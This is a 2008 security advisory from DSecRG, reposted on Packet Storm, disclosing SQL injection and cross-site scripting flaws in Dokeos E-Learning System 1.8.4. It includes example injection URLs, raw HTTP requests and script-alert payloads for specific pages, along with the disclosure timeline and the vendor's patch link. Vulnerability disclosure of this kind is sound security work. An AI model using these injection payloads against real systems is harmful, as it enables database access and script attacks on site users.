exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DSECRG-08-015.txt

DSECRG-08-015.txt
Posted Feb 20, 2008
Authored by Sh2kerr, Stas Svistunovich | Site dsecrg.com

Dokeos E-Learning System version 1.8.4 suffers from multiple SQL injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | cd9634d0aea265fcad8eabb0e0dc93235acca8bd33ddafd153c9968354db4b5b

DSECRG-08-015.txt

Change Mirror Download

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-015


Application: Dokeos E-Learning System
Versions Affected: 1.8.4
Vendor URL: http://dokeos.com
Bugs: Multiple SQL Injections,Multiple Blind SQL Injections,Multiple XSS, etc.
Exploits: YES
Reported: 25.01.2008
Vendor response: 28.01.2008
Patch released: 12.02.2008
Date of Public Advisory: 19.02.2008
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Dokeos E-Learning System system has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Blind Sql Injections
3. Multiple Stored XSS
4. Multiple Linked XSS
5. Image XSS

Details
*******


1. Multiple SQL Injections

1.1 Attacker can inject SQL code in module /whoisonline.php vulnerable parametr id
Attacker must have valid user creditionals


Example:
http://[server]/[installdir]/whoisonline.php?id=1'+and+"dsec"="dsecrg"+union+select+user(),version()/*


1.2 Attacker can inject SQL code in module main/mySpace/index.php vulnerable parameter tracking_list_coaches_column





Example:

http://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin
&tracking_list_coaches_column=0';

1.3 Attacker can inject SQL code in module /dokeos/main/create_course/add_course.php POST Parameter tutor_name


Example:

POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php

title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&
tutor_name='



---------------------------------------------------------------------


2. Multiple SQL Injections

2.1 Vulnerability found in script index.php in header parameter "Referer"


Example:

GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '

2.1 Vulnerability found in script /main/admin/class_list.php? in header parameter "X-Fowarded-For"



---------------------------------------------------------------------




3. Stored XSS vulnerability found in /main/auth/inscription.php attacker can inject XSS in POST parameter username


---------------------------------------------------------------------

4. Multiple linked XSS


4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php attacker can inject XSS in parameter courseCode


Example:

http://[server]/[installdir]/main/calendar/myagenda.php?courseCode="><script>alert('DSecRG XSS')</script>



4.2 Linked XSS vulnerability found in main/admin/course_category.php attacker can inject XSS in parameter category

Example:

http://[server]/[installdir]/dokeos/main/admin/course_category.php?category=<script>alert('DSecRG XSS')</script> HTTP/1.0



4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php attacker can inject XSS in parameter cmessage


Example:

http://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=>%22%27><img/src=javascript:alert('DSecRG XSS')>

---------------------------------------------------------------------


5. Image XSS vulnerability in page main/auth/profile.php attacker can upload avatar picture with XSS code:


Example:

More info: http://www.dsec.ru/about/articles/web_xss/ (in Russian)

---------------------------------------------------------------------

Fix Information
***************

Vendor fix this flaw on 12.02.2008. Patch for version 1.8.4 can be downloaded here:

http://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)





Digital Security Research Group mailto:research@dsec.ru
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close